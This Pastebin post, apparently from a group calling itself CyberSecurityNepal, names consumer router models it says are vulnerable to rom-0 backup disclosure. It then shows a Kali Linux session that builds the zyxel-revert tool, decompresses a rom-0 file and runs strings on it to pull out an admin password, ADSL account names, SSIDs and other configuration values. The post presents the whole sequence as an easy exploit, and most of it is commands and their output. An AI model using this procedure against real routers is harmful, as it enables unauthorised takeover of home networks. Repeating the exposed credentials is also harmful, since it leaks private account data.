Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ______ _ _ _ _ _____ _ _ _
- | ____| | | (_) | | | / ____| | | (_) |
- | |__ __ ___ __ | | ___ _| |_ | |__ _ _ | | _ _| |__ ___ _ __ ___ ___ ___ _ _ _ __ _| |_ _ _
- | __| \ \/ / '_ \| |/ _ \| | __| | '_ \| | | | | | | | | | '_ \ / _ \ '__/ __|/ _ \/ __| | | | '__| | __| | | |
- | |____ > <| |_) | | (_) | | |_ | |_) | |_| | | |___| |_| | |_) | __/ | \__ \ __/ (__| |_| | | | | |_| |_| |
- |______/_/\_\ .__/|_|\___/|_|\__| |_.__/ \__, | \_____\__, |_.__/ \___|_| |___/\___|\___|\__,_|_| |_|\__|\__, |
- | | __/ | __/ | __/ |
- |_| |___/ |___/ |___/
- -----------------------------------------------------------------------------------------------------------------------------+
- # vulnerability router easy decode rom-0 file with online and kali linux os the list vulnerability router name here!
- # FOR MORE INFORMATION AND COMMENTS PLEASE CONTACT ME: newfeedback@hotmail.com
- # WHITE HAT (#CYBERSECURITYNEPAL) ☄ ♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚
- -----------------------------------------------------------------------------------------------------------------------------+
- ★★★★★★★★★★★ This type of router mode #Vulnerable ★★★★★★★★★★★★★★
- -----------------------------------------------------------------------------------------------------------------------------+
- TP-LINK TL-WR841N
- PRN3001
- D-Link DIR-615, hardware: E4, firmware: 5.10
- PRN2001
- TP-LINK TL-WR740N
- Huawei Technologies HG8346R
- DrayTek Vigor2910
- Tenda 11N Wireless Router
- DD-WRT (name: Lumbini net, model: Buffalo WHR-G125)
- TP-LINK TL-WR841N
- Netis WF2533 Router
- TP-LINK TL-WR340G
- D-Link DIR-300, hardware: rev A1, firmware: 1.04-tomi-1.1.2
- Airocon DG-HR3400
- Micro DSL (TD-W8960N V7 0x00000000 | 1.0.5 Build 160118 Rel.59896)
- Micro DSL (TD-W8960N V7 0x00000000 | 1.0.5 Build 160118 Rel.59896)
- AirGrid M5 HP (Ubiquiti AirOS v5.5.6)
- Netis WF2419 Router
- TRENDnet TEW-731BR
- Huawei Technologies HG8546M
- ZTE ZXHN E5501, firmware: V1.0.0T8_Am
- TP-LINK TL-WR841N
- DrayTek Vigor2910V
- TP-LINK TL-WR740N
- Airocon Wireless Router
- NETGEAR WGR614v10
- ZyNOS ADSL (TD-W8901G)
- Airocon Netis Wireless Router, firmware: RTK V2.1.1
- D-Link DSL-2600U
- Easy bypass and exploit may router this tye of model
- --------------------------------------------------------------------------------------------------------------------------------+
- ☀☀☀☀☀☀☀☀☀☀☀☀☀☀☀ EXPLOIT KALI LINUX OS / ROM-0 DECOCDE ☀☀☀☀☀☀☀☀☀☀☀☀☀☀☀
- --------------------------------------------------------------------------------------------------------------------------------+
- remote: Counting objects: 8, done.
- remote: Compressing objects: 100% (5/5), done.
- remote: Total 8 (delta 1), reused 8 (delta 1), pack-reused 0
- Unpacking objects: 100% (8/8), done.
- root@kali:~/Desktop# ls ⌫
- tplink
- root@kali:~/Desktop# cd tplink ⌫
- root@kali:~/Desktop/tplink# ls ⌫
- zyxel-revert-779bfd5.tar.gz
- root@kali:~/Desktop/tplink# tar -xzf zyxel-revert-779bfd5.tar.gz
- root@kali:~/Desktop/tplink# ls ⌫
- zyxel-revert-779bfd5 zyxel-revert-779bfd5.tar.gz
- root@kali:~/Desktop/tplink# cd zyxel-revert-779bfd5
- root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# ls ⌫
- cfgpatch.c context.h filedata.h logging.h Makefile statemachine.c
- compress.c decompress.c linebuffer.c lzsc.c romfile.c statemachine.h
- configdata.c event.c linebuffer.h lzsc.h romfile.h xmodem.c
- configdata.h event.h list.h lzsd.c serial.c xmodem.h
- context.c filedata.c logging.c lzsd.h serial.h zyxel-revert.c
- root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# clear ⌫
- root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# make -f Makefile ⌫
- cc -O2 -pipe -Wall -MM -c compress.c -o compress.d
- cc -O2 -pipe -Wall -MM -c configdata.c -o configdata.d
- cc -O2 -pipe -Wall -MM -c cfgpatch.c -o cfgpatch.d
- cc -O2 -pipe -Wall -MM -c linebuffer.c -o linebuffer.d
- cc -O2 -pipe -Wall -MM -c romfile.c -o romfile.d
- cc -O2 -pipe -Wall -MM -c serial.c -o serial.d
- cc -O2 -pipe -Wall -MM -c statemachine.c -o statemachine.d
- cc -O2 -pipe -Wall -MM -c event.c -o event.d
- cc -O2 -pipe -Wall -MM -c context.c -o context.d
- cc -O2 -pipe -Wall -MM -c decompress.c -o decompress.d
- cc -O2 -pipe -Wall -MM -c lzsc.c -o lzsc.d
- cc -O2 -pipe -Wall -MM -c xmodem.c -o xmodem.d
- cc -O2 -pipe -Wall -MM -c lzsd.c -o lzsd.d
- cc -O2 -pipe -Wall -MM -c filedata.c -o filedata.d
- cc -O2 -pipe -Wall -MM -c logging.c -o logging.d
- cc -O2 -pipe -Wall -MM -c zyxel-revert.c -o zyxel-revert.d
- cc -O2 -pipe -Wall -c event.c -o event.o
- cc -O2 -pipe -Wall -c filedata.c -o filedata.o
- cc -O2 -pipe -Wall -c linebuffer.c -o linebuffer.o
- cc -O2 -pipe -Wall -c logging.c -o logging.o
- cc -O2 -pipe -Wall -c context.c -o context.o
- cc -O2 -pipe -Wall -c serial.c -o serial.o
- cc -O2 -pipe -Wall -c statemachine.c -o statemachine.o
- cc -O2 -pipe -Wall -c xmodem.c -o xmodem.o
- cc -O2 -pipe -Wall -c zyxel-revert.c -o zyxel-revert.o
- cc -O2 -pipe -Wall event.o filedata.o linebuffer.o logging.o context.o serial.o statemachine.o xmodem.o zyxel-revert.o -o zyxel-revert
- cc -O2 -pipe -Wall -c lzsc.c -o lzsc.o
- cc -O2 -pipe -Wall -c romfile.c -o romfile.o
- cc -O2 -pipe -Wall -c compress.c -o compress.o
- cc -O2 -pipe -Wall filedata.o lzsc.o romfile.o compress.o -o compress
- cc -O2 -pipe -Wall -c lzsd.c -o lzsd.o
- lzsd.c: In function ‘lzs_unpack’:
- lzsd.c:103:14: warning: unused variable ‘tmp’ [-Wunused-variable]
- uint32_t tmp = get_bits(&state, cnt);
- ^~~
- cc -O2 -pipe -Wall -c decompress.c -o decompress.o
- cc -O2 -pipe -Wall filedata.o lzsd.o romfile.o decompress.o -o decompress
- cc -O2 -pipe -Wall -c configdata.c -o configdata.o
- cc -O2 -pipe -Wall -c cfgpatch.c -o cfgpatch.o
- cc -O2 -pipe -Wall configdata.o filedata.o cfgpatch.o -o cfgpatch
- root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# ls
- cfgpatch context.h linebuffer.c lzsd.d statemachine.h
- cfgpatch.c context.o linebuffer.d lzsd.h statemachine.o
- cfgpatch.d decompress linebuffer.h lzsd.o xmodem.c
- cfgpatch.o decompress.c linebuffer.o Makefile xmodem.d
- compress decompress.d list.h romfile.c xmodem.h
- compress.c decompress.o logging.c romfile.d xmodem.o
- compress.d event.c logging.d romfile.h zyxel-revert
- compress.o event.d logging.h romfile.o zyxel-revert.c
- configdata.c event.h logging.o serial.c zyxel-revert.d
- configdata.d event.o lzsc.c serial.d zyxel-revert.o
- configdata.h filedata.c lzsc.d serial.h
- configdata.o filedata.d lzsc.h serial.o
- context.c filedata.h lzsc.o statemachine.c
- root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# ./decompress /root/Desktop/rom-0 ⌫
- header of previous block is=0x080000f2 expected=0x080000f2 OK
- header of previous block is=0x08000048 expected=0x08000048 OK
- header of previous block is=0x080000e0 expected=0x080000e0 OK
- header of previous block is=0x08000082 expected=0x08000082 OK
- header of previous block is=0x08000060 expected=0x08000060 OK
- header of previous block is=0x08000080 expected=0x08000080 OK
- header of previous block is=0x0800006b expected=0x0800006b OK
- header of previous block is=0x08000075 expected=0x08000075 OK
- header of previous block is=0x080000b7 expected=0x080000b7 OK
- header of previous block is=0x0800009d expected=0x0800009d OK
- header of previous block is=0x08000068 expected=0x08000068 OK
- header of previous block is=0x08000079 expected=0x08000079 OK
- header of previous block is=0x0800004c expected=0x0800004c OK
- header of previous block is=0x0800004d expected=0x0800004d OK
- header of previous block is=0x0800004b expected=0x0800004b OK
- header of previous block is=0x0800004d expected=0x0800004d OK
- header of previous block is=0x0800004e expected=0x0800004e OK
- header of previous block is=0x08000049 expected=0x08000049 OK
- header of previous block is=0x0800004e expected=0x0800004e OK
- header of previous block is=0x0800004c expected=0x0800004c OK
- header of previous block is=0x0800004b expected=0x0800004b OK
- header of previous block is=0x0800004e expected=0x0800004e OK
- header of previous block is=0x0800004c expected=0x0800004c OK
- header of previous block is=0x0800004b expected=0x0800004b OK
- header of previous block is=0x0800004f expected=0x0800004f OK
- header of previous block is=0x08000054 expected=0x08000054 OK
- header of previous block is=0x08000048 expected=0x08000048 OK
- header of previous block is=0x080000af expected=0x080000af OK
- header of previous block is=0x08000063 expected=0x08000063 OK
- header of previous block is=0x0800004e expected=0x0800004e OK
- header of previous block is=0x0800009c expected=0x0800009c OK
- header of previous block is=0x0800013c expected=0x0800013c OK
- header of previous block is=0x08000083 expected=0x08000083 OK
- header of previous block is=0x08000065 expected=0x08000065 OK
- header of previous block is=0x0800008a expected=0x0800008a OK
- header of previous block is=0x08000048 expected=0x08000048 OK
- header of previous block is=0x0800004f expected=0x0800004f OK
- header of previous block is=0x080000aa expected=0x080000aa OK
- header of previous block is=0x08000077 expected=0x08000077 OK
- header of previous block is=0x08000095 expected=0x08000095 OK
- header of previous block is=0x08000054 expected=0x08000054 OK
- header of previous block is=0x08000048 expected=0x08000048 OK
- header of previous block is=0x08000048 expected=0x08000048 OK
- header of previous block is=0x08000051 expected=0x08000051 OK
- header of previous block is=0x08000048 expected=0x08000048 OK
- header of previous block is=0x0800005b expected=0x0800005b OK
- header of previous block is=0x0800006f expected=0x0800006f OK
- header of previous block is=0x08000057 expected=0x08000057 OK
- header of previous block is=0x08000063 expected=0x08000063 OK
- header of previous block is=0x0800008a expected=0x0800008a OK
- header of previous block is=0x0800004f expected=0x0800004f OK
- header of previous block is=0x08000052 expected=0x08000052 OK
- header of previous block is=0x00ee000f expected=0x00ee000f OK
- lzs_unpack: decompressed 5908 (5908) bytes to 106734 (65536) bytes
- *** Error in `./decompress': double free or corruption (!prev): 0x807c1028 ***
- ======= Backtrace: =========
- /lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb757537a]
- /lib/i386-linux-gnu/libc.so.6(+0x6dfb7)[0xb757bfb7]
- /lib/i386-linux-gnu/libc.so.6(+0x6e776)[0xb757c776]
- ./decompress(main+0xca)[0x800fa6da]
- /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7526276]
- ./decompress(+0x724)[0x800fa724]
- ======= Memory map: ========
- 800fa000-800fc000 r-xp 00000000 08:01 990608 /root/Desktop/tplink/zyxel-revert-779bfd5/decompress
- 800fc000-800fd000 r--p 00001000 08:01 990608 /root/Desktop/tplink/zyxel-revert-779bfd5/decompress
- 800fd000-800fe000 rw-p 00002000 08:01 990608 /root/Desktop/tplink/zyxel-revert-779bfd5/decompress
- 807bd000-807de000 rw-p 00000000 00:00 0 [heap]
- b73e2000-b73fe000 r-xp 00000000 08:01 263589 /lib/i386-linux-gnu/libgcc_s.so.1
- b73fe000-b73ff000 r--p 0001b000 08:01 263589 /lib/i386-linux-gnu/libgcc_s.so.1
- b73ff000-b7400000 rw-p 0001c000 08:01 263589 /lib/i386-linux-gnu/libgcc_s.so.1
- b7400000-b7421000 rw-p 00000000 00:00 0
- b7421000-b7500000 ---p 00000000 00:00 0
- b750e000-b76bf000 r-xp 00000000 08:01 263552 /lib/i386-linux-gnu/libc-2.24.so
- b76bf000-b76c1000 r--p 001b0000 08:01 263552 /lib/i386-linux-gnu/libc-2.24.so
- b76c1000-b76c2000 rw-p 001b2000 08:01 263552 /lib/i386-linux-gnu/libc-2.24.so
- b76c2000-b76c5000 rw-p 00000000 00:00 0
- b76e5000-b76e8000 rw-p 00000000 00:00 0
- b76e8000-b76ea000 r--p 00000000 00:00 0 [vvar]
- b76ea000-b76ec000 r-xp 00000000 00:00 0 [vdso]
- b76ec000-b770e000 r-xp 00000000 08:01 263524 /lib/i386-linux-gnu/ld-2.24.so
- b770e000-b770f000 rw-p 00000000 00:00 0
- b770f000-b7710000 r--p 00022000 08:01 263524 /lib/i386-linux-gnu/ld-2.24.so
- b7710000-b7711000 rw-p 00023000 08:01 263524 /lib/i386-linux-gnu/ld-2.24.so
- bfa45000-bfa66000 rw-p 00000000 00:00 0 [stack]
- Aborted
- root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# strings /root/Desktop/rom-0.decomp ⌫⌫⌫⌫
- -----------------------------------------------------------------------------------
- decode the rom-0 file
- cas123 ------(PASSWORD FOUND) ☹☹☹☹☹☹☹☹☹☹☹☹
- TP-LINK
- public
- public
- public
- P8mC
- 24.56.178.140
- http://srrys.pw/2;clm
- d 777 2;./2`
- 2;./2`
- 2`Node1
- adsl35420797
- adsl35420797
- Node2
- Node3
- Node4
- Node5
- Node6
- Node7
- Node8
- adsl35420797
- adsl35420797
- uTorrent (TCP)
- uTorrent (UDP)
- dhcppc
- 0CAS XXXXXXX OOOOOO
- d + *
- Fe`.
- 12345678
- 123cas
- TP-LINK_012345
- d + *
- lzs_unpack: decompressed 5908 (5908) bytes to 106734 (65536) bytes
- TP-LINK_012346
- d + *
- TP-LINK_012347
- d + *
- default
- vlan15
- {/tr069
- TP-LINK
- TD-W8951ND
- DSL-Gateway
- TP-LINK Product
- TD-W8951ND V5
- 001D0F
- 0001-01-01T00:00:00Z
- YRT5390_1
- Trendchip 11BGN AP
- @user
- password
- QrUoz
- root@kali:~/Desktop/tplink/zyxel-revert-779bfd5#
- ---------------------------------------------------------------------------------------------------------------------------------------
- ❄❄❄❄❄❄❄❄❄❄❄ EXPLOIT BY #CyberSecurityNepal ❄❄❄❄❄❄❄❄❄❄❄
- ---------------------------------------------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement